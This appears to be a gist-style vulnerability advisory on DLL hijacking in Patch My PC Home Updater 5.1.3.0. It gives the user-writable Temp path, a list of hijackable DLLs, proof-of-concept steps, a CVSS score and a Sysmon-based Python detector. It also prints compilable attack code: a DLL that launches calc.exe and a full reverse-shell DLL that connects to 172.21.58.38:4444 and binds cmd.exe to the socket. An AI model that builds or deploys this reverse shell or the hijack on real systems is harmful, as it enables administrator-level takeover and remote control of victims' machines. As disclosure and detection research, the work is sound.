
@shellkraft
Last active April 23, 2025 12:25

DLL Hijacking in Patch My PC Home Updater (v5.1.3.0)

Product: Patch My PC Home Updater
Version Affected: 5.1.3.0 and prior
Platform: Windows 10 / 11 (x64)


Summary

Patch My PC Home Updater (v5.1.3.0 and earlier) is vulnerable to multiple DLL hijacking flaws: DLLs that are not present in its extraction folder are loaded from a user-writable directory under %TEMP% without validation.

The application launches with elevated Administrator privileges (via UAC prompt). As a result, any malicious DLL placed in that location by a standard user will be executed with Administrator rights upon application launch.

This allows a local attacker to reliably achieve arbitrary code execution as Administrator, leading to a critical local privilege escalation scenario.


Technical Details

Upon execution, Patch My PC Home Updater prompts for elevation via UAC and runs with High Integrity as a member of the Administrators group.

Once elevated, it extracts .NET runtime files into a user-writeable directory under:

%LOCALAPPDATA%\Temp\.net\PatchMyPC-HomeUpdater\SbL2KoWrF_hOa3+ItFVOhBm9mPo2SBA=\

The application then attempts to load several DLLs from its current working directory, i.e. the extraction folder above. If an expected DLL (e.g., kernel32.dll, WindowsCodecsExt.dll, uxtheme.dll, wininet.dll) is not present there and an attacker has placed a malicious version in this folder beforehand, it will be loaded and executed automatically with Administrator-level privileges.

This flaw enables a standard user to execute code in an elevated context, bypassing the intended UAC protection mechanism.


Affected Components

1. advapi32.dll
2. BCrypt.dll
3. comctl32.dll
4. crypt32.dll
5. dwmapi.dll
6. gdi32.dll
7. gdiplus.dll
8. imm32.dll
9. iphlpapi.dll
10. kernel32.dll
11. mscms.dll
12. msctf.dll
13. ntdll.dll
14. ole32.dll
15. oleaut32.dll
16. PresentationNative_cor3.dll
17. secur32.dll
18. shcore.dll
19. shell32.dll
20. sspicli.dll
21. System.IO.Compression.Native.dll
22. ucrtbase.dll
23. urlmon.dll
24. user32.dll
25. uxtheme.dll
26. vcruntime140_cor3.dll
27. WindowsCodecs.dll
28. WindowsCodecsExt.dll
29. winhttp.dll
30. Wininet.dll
31. wpfgfx_cor3.dll
32. ws2_32.dll
33. wtsapi32.dll
34. UIAutomationCore.dll
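As an added example (not part of this advisory and not the vendor's code), the following Python correlates Sysmon-style process-create (Event ID 1) and image-load (Event ID 7) records to surface the pattern described above: one of the listed DLL names loaded by an elevated process from a user-writable path instead of System32. Field names follow Sysmon; the records, the executable path and the process GUIDs are constructed.

```python
import re

# Subset of the DLL names listed above; a system DLL should never resolve
# from a user-writable folder such as %LOCALAPPDATA%\Temp.
HIJACKABLE = {"advapi32.dll", "bcrypt.dll", "comctl32.dll", "kernel32.dll",
              "uxtheme.dll", "wininet.dll", "windowscodecsext.dll", "ws2_32.dll"}
USER_WRITABLE = re.compile(r"\\(AppData\\Local\\Temp|ProgramData|Users\\Public)\\", re.I)
ELEVATED = {"high", "system"}          # Sysmon IntegrityLevel values of interest


def basename_lower(path):
    return path.rsplit("\\", 1)[-1].lower()


def find_hijack_loads(events):
    """Return (process image, loaded DLL) pairs matching the hijack pattern.
    Integrity level is taken from the Event ID 1 record with the same
    ProcessGuid, because Event ID 7 (Image loaded) does not carry it."""
    integrity = {e["ProcessGuid"]: e["IntegrityLevel"].lower()
                 for e in events if e["EventId"] == 1}
    hits = []
    for e in events:
        if e["EventId"] != 7:
            continue
        dll = e["ImageLoaded"]
        if (basename_lower(dll) in HIJACKABLE and USER_WRITABLE.search(dll)
                and integrity.get(e["ProcessGuid"]) in ELEVATED):
            hits.append((e["Image"], dll))
    return hits


# Constructed sample telemetry (not real logs): the elevated updater loads
# comctl32.dll from its Temp extraction folder, plus two benign loads.
UPDATER = r"C:\placeholder\PatchMyPC-HomeUpdater.exe"   # constructed path
TEMP_DIR = r"C:\Users\alice\AppData\Local\Temp\.net\PatchMyPC-HomeUpdater\SbL2KoWrF_hOa3+ItFVOhBm9mPo2SBA="
SAMPLE_EVENTS = [
    {"EventId": 1, "ProcessGuid": "{guid-1}", "IntegrityLevel": "High", "Image": UPDATER},
    {"EventId": 1, "ProcessGuid": "{guid-2}", "IntegrityLevel": "Medium",
     "Image": r"C:\Windows\System32\notepad.exe"},
    {"EventId": 7, "ProcessGuid": "{guid-1}", "Image": UPDATER,
     "ImageLoaded": TEMP_DIR + r"\comctl32.dll"},            # hijack pattern
    {"EventId": 7, "ProcessGuid": "{guid-1}", "Image": UPDATER,
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll"},    # normal load
    {"EventId": 7, "ProcessGuid": "{guid-2}", "Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\uxtheme.dll"},  # not elevated
]

if __name__ == "__main__":
    for image, dll in find_hijack_loads(SAMPLE_EVENTS):
        print(f"ALERT: elevated {image} loaded {dll}")
```

The same rule can be expressed as a Sigma or SIEM query (ImageLoaded under a user-writable path, basename in the list above, parent process elevated), which is the practical mitigation for defenders until the application restricts its DLL search path.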

Proof of Concept

  1. Create a malicious DLL named comctl32.dll that launches calc.exe or spawns a reverse shell.
  2. Place it in the following folder before the application starts:
     %LOCALAPPDATA%\Temp\.net\PatchMyPC-HomeUpdater\SbL2KoWrF_hOa3+ItFVOhBm9mPo2SBA=\
  3. Launch Patch My PC Home Updater.
  4. Observe execution of the malicious code (e.g., calc.exe or shell).

Demo (Calculator):

// Tested in Win10
// x86_64-w64-mingw32-g++ -shared --static -o hijack.dll hijack.cpp

#include <windows.h>

// Minimal DLL entry point: runs calc.exe once when the DLL is loaded into the process.
BOOL WINAPI DllMain(HINSTANCE hDll, DWORD dwReason, LPVOID lpReserved) {
    (void)hDll;
    (void)lpReserved;
    switch (dwReason) {
        case DLL_PROCESS_ATTACH:
            WinExec("calc.exe", 0); // This doesn't accept redirections like system()
            break;
        case DLL_PROCESS_DETACH:
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
            break;
    }
    return TRUE;
}

Demo (Reverse Shell):

// x86_64-w64-mingw32-g++ -shared -o patchpoc.dll patchpoc.cpp -lws2_32 -static

#include <winsock2.h>
#include <windows.h>
#include <ws2tcpip.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

DWORD WINAPI ReverseShell(LPVOID lpParam) {
    WSADATA wsaData;
    SOCKET sock;
    struct sockaddr_in server;

    STARTUPINFO si;
    PROCESS_INFORMATION pi;

    // Change IP and port
    const char *ip = "172.21.58.38";
    int port = 4444;

    WSAStartup(MAKEWORD(2, 2), &wsaData);
    sock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);  // 6 args now

    server.sin_family = AF_INET;
    server.sin_port = htons(port);
    server.sin_addr.s_addr = inet_addr(ip);

    if (WSAConnect(sock, (SOCKADDR*)&server, sizeof(server), NULL, NULL, NULL, NULL) == SOCKET_ERROR) {
        closesocket(sock);
        WSACleanup();
        return 1;
    }

    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
    si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)sock;

    ZeroMemory(&pi, sizeof(pi));
    CreateProcess(NULL, (LPSTR)"cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);

    WaitForSingleObject(pi.hProcess, INFINITE);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    closesocket(sock);
    WSACleanup();
    return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
        CreateThread(NULL, 0, ReverseShell, NULL, 0, NULL);
    }
    return TRUE;
}

Impact

  • Arbitrary code execution as Administrator, leading to a local privilege escalation.

CVSS v3.1 Score

Vector:
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Base Score: 8.8 / 10 (High)

@shellkraft (Author)

patchmypc.mp4